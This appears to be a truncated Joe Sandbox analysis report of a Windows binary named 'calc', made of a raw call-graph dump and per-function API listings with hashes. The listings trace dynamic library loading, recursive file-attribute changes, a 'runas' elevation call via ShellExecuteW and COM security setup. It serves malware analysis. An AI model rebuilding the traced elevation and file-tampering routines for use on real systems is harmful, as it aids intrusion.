50012 41ff6d GetFullPathNameW 50011->50012 50013 416d00 36 API calls 50012->50013 50014 41ff99 50013->50014 50015 416d00 36 API calls 50014->50015 50016 41ffa8 50015->50016 50017 416d00 36 API calls 50016->50017 50017->50010 50019 4162aa 50018->50019 50020 4162ae OpenSCManagerW 50018->50020 50019->49872 50021 4162e9 50020->50021 50022 4162bf LockServiceDatabase 50020->50022 50021->49872 50023 4162d3 GetLastError 50022->50023 50024 4162ca UnlockServiceDatabase 50022->50024 50025 4162e0 50023->50025 50026 4162e2 CloseServiceHandle 50023->50026 50024->50025 50025->50026 50026->50021 50028 4012e9 LoadImageW 50027->50028 50029 4012cf 50027->50029 50031 4012ff RegisterClassExW 50028->50031 50029->50028 50030 4012d8 50029->50030 50570 416168 50030->50570 50574 404205 7 API calls 50031->50574 50034 401243 50036 401371 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 50034->50036 50036->49873 50037->49855 50038->49884 50039->49886 50040->49875 50042 4183f6 ctype VariantClear 50041->50042 50043 418b13 50042->50043 50044 449170 36 API calls 50043->50044 50045 418b21 50044->50045 50046 401428 50045->50046 50047 416c4c 36 API calls 50045->50047 50046->49928 50047->50046 50049 401b48 50048->50049 50050 401b39 50048->50050 50069 416cee 36 API calls 50049->50069 50051 416d00 36 API calls 50050->50051 50052 401b44 50051->50052 50052->49943 50054 401b5a 50054->49943 50070 44c2b2 GetLastError FlsGetValue 50055->50070 50057 449086 50061 449099 50057->50061 50080 44c23e 36 API calls 2 library calls 50057->50080 50059 44b526 64 API calls 50059->50061 50060 4014b8 50060->49946 50060->49947 50061->50059 50061->50060 50064 419e63 50062->50064 50063 4015e2 50063->49977 50064->50063 50065 449170 36 API calls 50064->50065 50066 419e89 50065->50066 50066->50063 50083 418198 36 API calls 50066->50083 50068->49961 50069->50054 50071 44c317 SetLastError 50070->50071 50072 44c2ce 50070->50072 50071->50057 50081 4504cf 36 API calls 3 library calls 50072->50081 50074 44c2da 50075 44c2e2 FlsSetValue 50074->50075 50076 44c30f 50074->50076 50075->50076 50077 44c2f3 GetCurrentThreadId 50075->50077 50082 44be4f 36 API calls _fast_error_exit 50076->50082 50077->50071 50079 44c316 50079->50071 50080->50061 50081->50074 50082->50079 50083->50063 50133 449154 50084->50133 50086 414eb2 SHGetMalloc 50087 414ed3 SHGetDesktopFolder 50086->50087 50089 414ec2 50086->50089 50088 414ee1 50087->50088 50087->50089 50088->50089 50090 414f03 SHGetPathFromIDListW 50088->50090 50089->49994 50090->50089 50092 40fb7f 50091->50092 50094 40fb59 50091->50094 50093 416034 36 API calls 50092->50093 50095 40fb8b 50093->50095 50094->50092 50097 44907d 64 API calls 50094->50097 50100 40fbae 50094->50100 50135 403d50 36 API calls 50095->50135 50097->50094 50098 40fb9b 50136 403d50 36 API calls 50098->50136 50100->49996 50102 41056f _fast_error_exit 50101->50102 50137 442c1c 50102->50137 50105 410595 50107 4105f9 50105->50107 50108 41059a 50105->50108 50106 4105b9 50155 443162 50106->50155 50209 414469 55 API calls 50107->50209 50200 40ffa0 114 API calls _fast_error_exit 50108->50200 50113 41060d 50126 4105b4 50113->50126 50114 443162 69 API calls 50116 4105e7 50114->50116 50117 4105eb 50116->50117 50129 410617 50116->50129 50117->50107 50119 4105f1 50117->50119 50118 410714 50120 449c88 ___free_lc_time 36 API calls 50118->50120 50201 44a855 50119->50201 50123 410722 50120->50123 50124 44a855 48 API calls 50123->50124 50123->50126 50124->50126 50126->49992 50129->50118 50192 410414 38 API calls _fast_error_exit 50129->50192 50193 40fe2c 64 API calls 50129->50193 50194 40fdf3 56 API calls 50129->50194 50195 40fdc4 56 API calls 50129->50195 50196 40fac3 50129->50196 50210 449d8c 56 API calls 50129->50210 50211 41073c 66 API calls 50129->50211 50212 40fa56 36 API calls 50129->50212 50134 44915c 50133->50134 50134->50086 50134->50134 50135->50098 50136->50100 50138 4168a2 38 API calls 50137->50138 50139 442c32 50138->50139 50140 4168a2 38 API calls 50139->50140 50141 442c3f _strcat 50140->50141 50213 442a91 50141->50213 50147 442cc1 50148 442cd2 50147->50148 50149 442cc9 50147->50149 50229 44a98f 50148->50229 50150 44a855 48 API calls 50149->50150 50152 410591 50150->50152 50152->50105 50152->50106 50153 442cdf 50237 44be0e 50153->50237 50156 4168a2 38 API calls 50155->50156 50157 44317a _strcat 50156->50157 50158 44a64b 47 API calls 50157->50158 50159 4431af 50158->50159 50498 4432ef 50159->50498 50162 44a98f 46 API calls 50163 4431de 50162->50163 50164 44a98f 46 API calls 50163->50164 50165 4431ec 50164->50165 50166 44a98f 46 API calls 50165->50166 50167 443205 50166->50167 50168 44a98f 46 API calls 50167->50168 50169 44321e 50168->50169 50170 44a64b 47 API calls 50169->50170 50171 443235 50170->50171 50172 449adf __getbuf 36 API calls 50171->50172 50173 44323f 50172->50173 50174 449adf __getbuf 36 API calls 50173->50174 50175 443248 50174->50175 50176 44a98f 46 API calls 50175->50176 50177 443256 50176->50177 50504 442e08 50177->50504 50179 44326c 50180 443291 50179->50180 50181 44327c 50179->50181 50183 443297 50180->50183 50184 4432d3 50180->50184 50182 449c88 ___free_lc_time 36 API calls 50181->50182 50186 443284 50182->50186 50508 441b62 66 API calls 50183->50508 50185 449c88 ___free_lc_time 36 API calls 50184->50185 50188 4105ce 50185->50188 50187 449c88 ___free_lc_time 36 API calls 50186->50187 50187->50188 50188->50114 50188->50129 50190 4432cb 50191 449c88 ___free_lc_time 36 API calls 50190->50191 50191->50188 50192->50129 50193->50129 50194->50129 50195->50129 50197 40fac9 50196->50197 50199 40faeb 50196->50199 50198 449170 36 API calls 50197->50198 50198->50199 50199->50129 50200->50126 50202 44a861 __lock 50201->50202 50203 44b8fc 37 API calls 50202->50203 50206 44a86e __lock 50202->50206 50204 44a881 50203->50204 50510 44a809 50204->50510 50206->50107 50209->50113 50210->50129 50211->50129 50212->50129 50214 442a9e _strlen 50213->50214 50245 44220e 50214->50245 50217 44bc99 50266 44bc3d 50217->50266 50219 442caf 50219->50152 50220 442d0d 50219->50220 50222 442d1a _strcat _fast_error_exit 50220->50222 50221 44a98f 46 API calls 50221->50222 50222->50221 50223 44a64b 47 API calls 50222->50223 50224 442dc3 50222->50224 50228 442de3 50222->50228 50223->50222 50225 44a64b 47 API calls 50224->50225 50226 442dd1 50225->50226 50227 44a98f 46 API calls 50226->50227 50227->50228 50228->50147 50230 44a99b __lock 50229->50230 50357 44b8fc 50230->50357 50232 44a9a3 50363 44a8a6 50232->50363 50236 44a9c8 __lock 50236->50153 50238 44be1a __lock 50237->50238 50239 44b8fc 37 API calls 50238->50239 50240 44be22 50239->50240 50442 44bcac 50240->50442 50244 44be3c __lock 50244->50152 50246 442226 _fast_error_exit __umatherr 50245->50246 50248 4422b2 50246->50248 50249 44a129 50246->50249 50248->50217 50254 44eda8 50249->50254 50252 44a166 50252->50246 50255 44f527 50254->50255 50264 44edf4 __aulldvrm _strlen 50254->50264 50256 44c969 __startOneArgErrorHandling 36 API calls 50255->50256 50257 44a158 50256->50257 50257->50252 50265 44cbd4 45 API calls 2 library calls 50257->50265 50258 44ed1a 45 API calls _write_multi_char 50258->50264 50259 455332 37 API calls _write_multi_char 50259->50264 50260 449adf __getbuf 36 API calls 50260->50264 50261 449c88 ___free_lc_time 36 API calls 50261->50264 50262 44ed71 45 API calls 50262->50264 50263 44ed4d 45 API calls _write_multi_char 50263->50264 50264->50255 50264->50258 50264->50259 50264->50260 50264->50261 50264->50262 50264->50263 50265->50252 50267 44bc49 __lock 50266->50267 50277 44f6d3 50267->50277 50269 44bc4e 50270 44bc64 50269->50270 50271 44bc55 50269->50271 50297 452f60 50270->50297 50301 44d915 36 API calls __umatherr 50271->50301 50276 44bc5a __lock 50276->50219 50278 44f6df __lock 50277->50278 50279 44c6db __lock 36 API calls 50278->50279 50280 44f6ed 50279->50280 50281 44f75a 50280->50281 50282 44f75e 50280->50282 50290 44c63b __lock 36 API calls 50280->50290 50306 44b92b 37 API calls __lock 50280->50306 50307 44b97d RtlLeaveCriticalSection RtlLeaveCriticalSection __lock 50280->50307 50303 44f7ec 50281->50303 50284 449adf __getbuf 36 API calls 50282->50284 50285 44f768 50284->50285 50285->50281 50287 44f77e 50285->50287 50286 44f7e1 __lock 50286->50269 50308 454432 GetModuleHandleA GetProcAddress __lock 50287->50308 50290->50280 50291 44f78c 50293 44f797 50291->50293 50294 44f7aa RtlEnterCriticalSection 50291->50294 50295 449c88 ___free_lc_time 36 API calls 50293->50295 50294->50281 50296 44f79f 50295->50296 50296->50281 50298 452f7f 50297->50298 50299 44bc77 50298->50299 50310 455e88 50298->50310 50302 44bc8f RtlLeaveCriticalSection RtlLeaveCriticalSection 50299->50302 50301->50276 50302->50276 50309 44c626 RtlLeaveCriticalSection 50303->50309 50305 44f7f3 50305->50286 50306->50280 50307->50280 50308->50291 50309->50305 50311 455e94 __lock 50310->50311 50316 455ba1 50311->50316 50315 455ec4 __lock 50315->50299 50319 455bbc 50316->50319 50317 455c28 50318 44d915 __umatherr 36 API calls 50317->50318 50320 455c2d 50318->50320 50319->50317 50322 455c42 50319->50322 50321 44d91e _write_multi_char 36 API calls 50320->50321 50339 455c38 50321->50339 50323 455cb5 50322->50323 50325 455c8c 50322->50325 50324 44d915 __umatherr 36 API calls 50323->50324 50326 455cba 50324->50326 50328 4509a2 39 API calls 50325->50328 50327 44d91e _write_multi_char 36 API calls 50326->50327 50327->50339 50329 455d3a 50328->50329 50330 455d43 50329->50330 50331 455d5d CreateFileA 50329->50331 50334 44d915 __umatherr 36 API calls 50330->50334 50332 455d9c GetLastError 50331->50332 50333 455d8a GetFileType 50331->50333 50337 44d927 _write_multi_char 36 API calls 50332->50337 50335 455d95 CloseHandle 50333->50335 50336 455dab 50333->50336 50338 455d48 50334->50338 50335->50332 50341 4507a4 37 API calls 50336->50341 50337->50339 50340 44d91e _write_multi_char 36 API calls 50338->50340 50356 455ecd RtlLeaveCriticalSection _write_multi_char 50339->50356 50340->50339 50342 455dc6 50341->50342 50342->50339 50343 44f7f5 _write_multi_char 38 API calls 50342->50343 50344 455e09 50343->50344 50345 455e14 50344->50345 50346 455e3d 50344->50346 50347 44d91e _write_multi_char 36 API calls 50345->50347 50348 44ff81 42 API calls 50346->50348 50349 455e19 50347->50349 50350 455e4d 50348->50350 50349->50339 50353 44fd57 39 API calls 50349->50353 50351 455e63 50350->50351 50354 45705f 45 API calls 50350->50354 50351->50349 50352 44f7f5 _write_multi_char 38 API calls 50351->50352 50352->50349 50355 455e82 50353->50355 50354->50351 50356->50315 50358 44b920 RtlEnterCriticalSection 50357->50358 50359 44b909 50357->50359 50358->50232 50359->50358 50360 44b910 50359->50360 50361 44c6db __lock 36 API calls 50360->50361 50362 44b91e 50361->50362 50362->50232 50364 44a8c3 50363->50364 50365 44a8ca 50363->50365 50368 44a9d1 50364->50368 50365->50364 50371 45015e 50365->50371 50389 44fea0 50365->50389 50435 44b94e 50368->50435 50370 44a9d9 50370->50236 50372 45016a __lock 50371->50372 50373 4501ed 50372->50373 50375 450195 50372->50375 50426 44d915 36 API calls __umatherr 50373->50426 50395 4508e0 50375->50395 50376 4501f2 50427 44d91e 36 API calls __umatherr 50376->50427 50379 45019b 50380 4501bd 50379->50380 50381 4501a9 50379->50381 50423 44d915 36 API calls __umatherr 50380->50423 50407 44ff81 50381->50407 50384 4501b5 50425 4501e5 RtlLeaveCriticalSection _write_multi_char 50384->50425 50385 4501c2 50424 44d91e 36 API calls __umatherr 50385->50424 50387 4501dd __lock 50387->50365 50390 44feb0 50389->50390 50394 44febc 50389->50394 50391 44fed9 50390->50391 50390->50394 50434 45492b 36 API calls __getbuf 50390->50434 50393 45015e 44 API calls 50391->50393 50393->50394 50394->50365 50396 4508ec __lock 50395->50396 50397 45094e RtlEnterCriticalSection 50396->50397 50399 44c6db __lock 36 API calls 50396->50399 50398 45096e __lock 50397->50398 50398->50379 50400 450914 50399->50400 50401 450945 50400->50401 50402 45091d 50400->50402 50429 450977 RtlLeaveCriticalSection __lock 50401->50429 50428 454432 GetModuleHandleA GetProcAddress __lock 50402->50428 50405 45092b 50405->50401 50406 450931 __lock 50405->50406 50406->50398 50410 44ff9d 50407->50410 50418 450022 50407->50418 50408 44ffec ReadFile 50409 450005 GetLastError 50408->50409 50416 45003e 50408->50416 50411 450026 50409->50411 50412 450012 50409->50412 50410->50408 50410->50418 50411->50418 50432 44d927 36 API calls __umatherr 50411->50432 50430 44d915 36 API calls __umatherr 50412->50430 50414 450017 50431 44d91e 36 API calls __umatherr 50414->50431 50416->50418 50419 4500ba ReadFile 50416->50419 50418->50384 50420 4500d8 GetLastError 50419->50420 50421 4500e2 50419->50421 50420->50416 50420->50421 50421->50416 50433 455696 38 API calls 2 library calls 50421->50433 50423->50385 50424->50384 50425->50387 50426->50376 50427->50387 50428->50405 50429->50397 50430->50414 50431->50418 50432->50418 50433->50421 50434->50391 50436 44b972 RtlLeaveCriticalSection 50435->50436 50437 44b95b 50435->50437 50436->50370 50437->50436 50438 44b962 50437->50438 50441 44c626 RtlLeaveCriticalSection 50438->50441 50440 44b970 50440->50370 50441->50440 50443 44bcc5 50442->50443 50454 44f869 50443->50454 50445 44bcd1 50446 44bd3e 50445->50446 50448 44bcfe 50445->50448 50452 44bce5 50445->50452 50472 44d915 36 API calls __umatherr 50446->50472 50449 44f869 _write_multi_char 40 API calls 50448->50449 50448->50452 50450 44bd9d 50449->50450 50451 44f869 _write_multi_char 40 API calls 50450->50451 50450->50452 50451->50452 50453 44be45 RtlLeaveCriticalSection RtlLeaveCriticalSection 50452->50453 50453->50244 50455 44f875 __lock 50454->50455 50456 44f8f8 50455->50456 50458 44f8a0 50455->50458 50487 44d915 36 API calls __umatherr 50456->50487 50460 4508e0 _write_multi_char 37 API calls 50458->50460 50459 44f8fd 50488 44d91e 36 API calls __umatherr 50459->50488 50462 44f8a6 50460->50462 50463 44f8b4 50462->50463 50464 44f8c8 50462->50464 50473 44f7f5 50463->50473 50484 44d915 36 API calls __umatherr 50464->50484 50467 44f8cd 50485 44d91e 36 API calls __umatherr 50467->50485 50468 44f8e8 __lock 50468->50445 50469 44f8c0 50486 44f8f0 RtlLeaveCriticalSection _write_multi_char 50469->50486 50472->50452 50489 45089f 50473->50489 50475 44f800 50476 44f816 SetFilePointer 50475->50476 50477 44f806 50475->50477 50479 44f837 50476->50479 50480 44f82f GetLastError 50476->50480 50496 44d915 36 API calls __umatherr 50477->50496 50482 44f843 50479->50482 50497 44d927 36 API calls __umatherr 50479->50497 50480->50479 50481 44f80b 50481->50469 50482->50469 50484->50467 50485->50469 50486->50468 50487->50459 50488->50468 50490 4508ab 50489->50490 50491 44d915 __umatherr 36 API calls 50490->50491 50492 4508c6 50490->50492 50493 4508ce 50491->50493 50492->50475 50494 44d91e _write_multi_char 36 API calls 50493->50494 50495 4508d9 50494->50495 50495->50475 50496->50481 50497->50482 50499 443300 50498->50499 50500 4431c5 50499->50500 50501 44a98f 46 API calls 50499->50501 50502 442e08 GetSystemTimeAsFileTime 50499->50502 50503 44a64b 47 API calls 50499->50503 50500->50162 50500->50188 50501->50499 50502->50499 50503->50499 50505 442e29 50504->50505 50507 442e49 50505->50507 50509 442bd5 GetSystemTimeAsFileTime 50505->50509 50507->50179 50508->50190 50509->50505 50511 44a818 50510->50511 50518 44a835 50510->50518 50521 44b36d 50511->50521 50517 44a82e 50517->50518 50519 449c88 ___free_lc_time 36 API calls 50517->50519 50520 44a89e RtlLeaveCriticalSection RtlLeaveCriticalSection 50518->50520 50519->50518 50520->50206 50522 44b382 50521->50522 50524 44a81e 50521->50524 50522->50524 50545 44fcac 43 API calls 3 library calls 50522->50545 50525 44fe75 50524->50525 50526 44fe81 50525->50526 50527 44a826 50525->50527 50526->50527 50528 449c88 ___free_lc_time 36 API calls 50526->50528 50529 44fdda 50527->50529 50528->50527 50530 44fde6 __lock 50529->50530 50531 44fe59 50530->50531 50533 44fe11 50530->50533 50563 44d915 36 API calls __umatherr 50531->50563 50535 4508e0 _write_multi_char 37 API calls 50533->50535 50534 44fe5e 50564 44d91e 36 API calls __umatherr 50534->50564 50537 44fe17 50535->50537 50538 44fe25 50537->50538 50539 44fe31 50537->50539 50546 44fd57 50538->50546 50561 44d915 36 API calls __umatherr 50539->50561 50542 44fe2b 50562 44fe51 RtlLeaveCriticalSection _write_multi_char 50542->50562 50543 44fe49 __lock 50543->50517 50545->50524 50547 45089f _write_multi_char 36 API calls 50546->50547 50548 44fd63 50547->50548 50549 44fda5 50548->50549 50551 44fd83 50548->50551 50552 45089f _write_multi_char 36 API calls 50548->50552 50565 450820 37 API calls 2 library calls 50549->50565 50551->50549 50553 45089f _write_multi_char 36 API calls 50551->50553 50555 44fd7a 50552->50555 50556 44fd8f CloseHandle 50553->50556 50554 44fdad 50557 44fdcf 50554->50557 50566 44d927 36 API calls __umatherr 50554->50566 50558 45089f _write_multi_char 36 API calls 50555->50558 50556->50549 50559 44fd9b GetLastError 50556->50559 50557->50542 50558->50551 50559->50549 50561->50542 50562->50543 50563->50534 50564->50543 50565->50554 50566->50557 50567->50004 50568->50008 50569->50011 50571 4161a1 LoadImageW 50570->50571 50572 41616d EnumResourceNamesW 50570->50572 50573 4012e6 50571->50573 50572->50571 50572->50573 50573->50031 50574->50034 50576 44aecd __lock 50575->50576 50577 44c6db __lock 34 API calls 50576->50577 50578 44aed4 50577->50578 50579 44aee5 GetCurrentProcess TerminateProcess 50578->50579 50580 44aef5 __startOneArgErrorHandling 50578->50580 50579->50580 50585 44af70 RtlLeaveCriticalSection __lock 50580->50585 50582 44af58 50583 44af6b __lock 50582->50583 50586 44adfd GetModuleHandleA 50582->50586 50583->49792 50585->50582 50587 44ae22 ExitProcess 50586->50587 50588 44ae0c GetProcAddress 50586->50588 50588->50587 50589 44ae1c 50588->50589 50589->50587

    Executed Functions

    Function 00439814 Relevance: 58.6, APIs: 11, Strings: 22, Instructions: 893libraryloaderCOMMON
    Download Yara Rule
    APIs
    • CharLowerBuffW.USER32(?,?), ref: 00439B3E
    • LoadLibraryW.KERNEL32(00000000), ref: 00439D9D
    • GetProcAddress.KERNEL32(?,00000000), ref: 00439E47
    • GetProcAddress.KERNEL32(?,00000000), ref: 00439E72
    • GetProcAddress.KERNEL32(?,00000000), ref: 00439EB3
    • FreeLibrary.KERNEL32(?), ref: 00439ECB
    • _strcat.LIBCMT ref: 00439F85
    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF), ref: 0043A15D
    • TerminateProcess.KERNEL32(00000000), ref: 0043A164
    • FreeLibrary.KERNEL32(?), ref: 0043A2A5
      • Part of subcall function 0041684E: _strlen.LIBCMT ref: 0041685F
      • Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416879
      • Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416898
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressCharLibraryProc$ByteFreeMultiProcessWide$BuffCurrentLoadLowerTerminate_strcat_strlen
    • String ID: cdecl$dword$hwnd$idispatch$idispatch_ptr$int$int_ptr$long$long_ptr$none$ptr$short$short_ptr$stdcall$str$string$udword$uint$ushort$winapi$wstr$wstring
    • API String ID: 1015931265-983588477
    • Opcode ID: d400400d415b18554a742df9ff770db33aa2bbfdb7a860927ff947ee42498477
    • Instruction ID: 62d45698e8f6199696b40485e1186079554493d45d8b932d3fe4b0ade1180d93
    • Opcode Fuzzy Hash: d400400d415b18554a742df9ff770db33aa2bbfdb7a860927ff947ee42498477
    • Instruction Fuzzy Hash: 2562B431D00618AFDF11DFA5C8416DEB7B1AF09314F1441ABE905BB2A1CBB99E85CF89
    Function 00425639 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 117fileCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 351 425639-425661 FindFirstFileW 352 425663-425665 351->352 353 42566a 351->353 354 425787-42578a 352->354 355 42566b-425686 call 44925f 353->355 358 4256c8-4256d8 FindNextFileW 355->358 359 425688-42569d call 44925f 355->359 358->355 361 4256da-4256e1 FindClose 358->361 359->358 368 42569f-4256c6 GetFileAttributesW SetFileAttributesW 359->368 362 4256e3-4256e5 361->362 363 4256f1-425705 FindFirstFileW 361->363 365 425786 362->365 366 425707 363->366 367 42577d 363->367 365->354 370 42570d-425714 366->370 369 42577f-425784 FindClose 367->369 368->358 371 4256ea-4256ec 368->371 369->365 372 425716-42572b call 44925f 370->372 373 425769-42577b FindNextFileW 370->373 371->369 372->373 376 42572d-425743 call 44925f 372->376 373->367 373->370 376->373 379 425745-425764 SetCurrentDirectoryW call 425639 376->379 379->371 382 425766-425767 SetCurrentDirectoryW 379->382 382->373
    APIs
    • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00425657
    • GetFileAttributesW.KERNEL32(?,74DE8FB0), ref: 004256A6
    • SetFileAttributesW.KERNEL32(?,00000000), ref: 004256BE
    • FindNextFileW.KERNELBASE(00000000,?,74DE8FB0), ref: 004256D0
    • FindClose.KERNEL32(00000000), ref: 004256DB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: File$Find$Attributes$CloseFirstNext
    • String ID: *.*
    • API String ID: 3380241538-438819550
    • Opcode ID: 1236b3d9e8567393027ac3975af6954621a9665af5743f4ca753b3688c86b07b
    • Instruction ID: 4e70fa6d35b8864b9043a15bda1432a6da936626901fdaf7e3990b9e5699e330
    • Opcode Fuzzy Hash: 1236b3d9e8567393027ac3975af6954621a9665af5743f4ca753b3688c86b07b
    • Instruction Fuzzy Hash: E7319471601629FADF209FA0EC49EDF77ACAF44311F5004A7E804A2191EA79DE449B18
    Function 0040109D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134COMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,004679CC), ref: 004010BF
      • Part of subcall function 004013E2: GetModuleFileNameW.KERNEL32(00000000,00479BFC,00000104,00000000,004679CC,00479BD8), ref: 00401412
      • Part of subcall function 004013E2: GetModuleFileNameW.KERNEL32(00000000,00479BD8,00000104,CmdLine), ref: 0040151F
    • SetCurrentDirectoryW.KERNEL32(?,00479BFC,00000000), ref: 0040116B
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00479BFC,00000000), ref: 004011B2
    • GetForegroundWindow.USER32(runas,?,004018CB,?,00000001,0045C5B4,74DF0A60,0045C5B4), ref: 004011FC
    • ShellExecuteW.SHELL32(00000000), ref: 00401203
    • SetCurrentDirectoryW.KERNEL32(?,00000001,00479BFC,00000000), ref: 00401272
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CurrentDirectoryFileModuleName$ExecuteForegroundShellWindow
    • String ID: runas
    • API String ID: 1789910257-4000483414
    • Opcode ID: f384245ce1ba01e77c44ee15ae304077787e465b938733e56d3d0cf4b13d63d3
    • Instruction ID: 93bf78c1261f2050e188375e0006e403e34581d150756637ae35598e928dc03f
    • Opcode Fuzzy Hash: f384245ce1ba01e77c44ee15ae304077787e465b938733e56d3d0cf4b13d63d3
    • Instruction Fuzzy Hash: 5F41C571904258AEDF10ABA09C85BEE3B689B09315F0041BBF945B61E3C77CDD898B69
    Function 00430DCB Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 250comCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • OleInitialize.OLE32(00000000), ref: 00430E15
    • CLSIDFromProgID.COMBASE(00000000,?,00000000), ref: 00430E32
    • CoCreateInstance.OLE32(?,00000000,00000005,0045AFF8,?), ref: 00430E71
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00430F05
    • CoCreateInstanceEx.OLE32(?,00000000,00000010,?,00000001,?,?,?,?), ref: 0043103D
    • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800,?,?,?), ref: 00431078
    Strings
    • NULL Pointer assignment, xrefs: 00431096
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CreateInitializeInstance$BlanketFromProgProxySecurity
    • String ID: NULL Pointer assignment
    • API String ID: 628432406-2785691316
    • Opcode ID: f9731c3437173b5b488cc14b24221418da99c7f72f1f08baffce0abea34d823b
    • Instruction ID: e386be8ca80e5d29cc4fe2e7b532a083d7082a5dc51ef75c75596564310f3180
    • Opcode Fuzzy Hash: f9731c3437173b5b488cc14b24221418da99c7f72f1f08baffce0abea34d823b
    • Instruction Fuzzy Hash: 7A91157290020CEFDF10EFA5DC81ADE7BB8FB08358F10462AF915A7251E7799D858B94
    Function 0040EA76 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 955 40ea76-40eac5 GetVersionExW call 4493b8 958 40eacb-40eb69 955->958 959 40ebce-40ebd1 955->959 960 40eca7-40ecc4 958->960 961 40eb6f-40eb7b 958->961 962 40ebd3-40ebd7 959->962 963 40ebbe-40ebc9 959->963 967 40ecc6-40ecc9 960->967 968 40ecf7 960->968 964 40eb81-40eb82 961->964 965 40ec97-40eca5 961->965 969 40ebe9-40ebfb call 449154 962->969 970 40ebd9-40ebe2 962->970 963->962 966 40ebcb 963->966 976 40ec33-40ec3f 964->976 977 40eb88-40eb89 964->977 975 40ecfe-40ed20 GetCurrentProcess call 40edd4 965->975 966->959 971 40ece7-40ecf5 967->971 972 40eccb-40ecce 967->972 968->975 987 40ec01-40ec04 969->987 970->969 973 40ebe4-40ebe7 970->973 971->975 972->975 978 40ecd0-40ece5 972->978 973->969 973->970 992 40ed22 975->992 993 40ed29-40ed42 975->993 981 40ec41-40ec4f 976->981 982 40ec54-40ec57 976->982 977->975 983 40eb8f-40eb9b 977->983 978->975 981->975 985 40ec70-40ec73 982->985 986 40ec59-40ec6b 982->986 983->987 988 40eb9d-40ebb9 983->988 985->975 990 40ec79-40ec95 985->990 986->975 987->975 989 40ec0a-40ec2e 987->989 988->975 989->975 990->975 992->993 994 40ed44-40ed56 call 40ee00 993->994 995 40ed86-40ed90 GetSystemInfo 993->995 1004 40ed65-40ed69 994->1004 1005 40ed58-40ed63 call 40edea GetNativeSystemInfo 994->1005 996 40ed72-40ed78 995->996 998 40ed92-40ed96 996->998 999 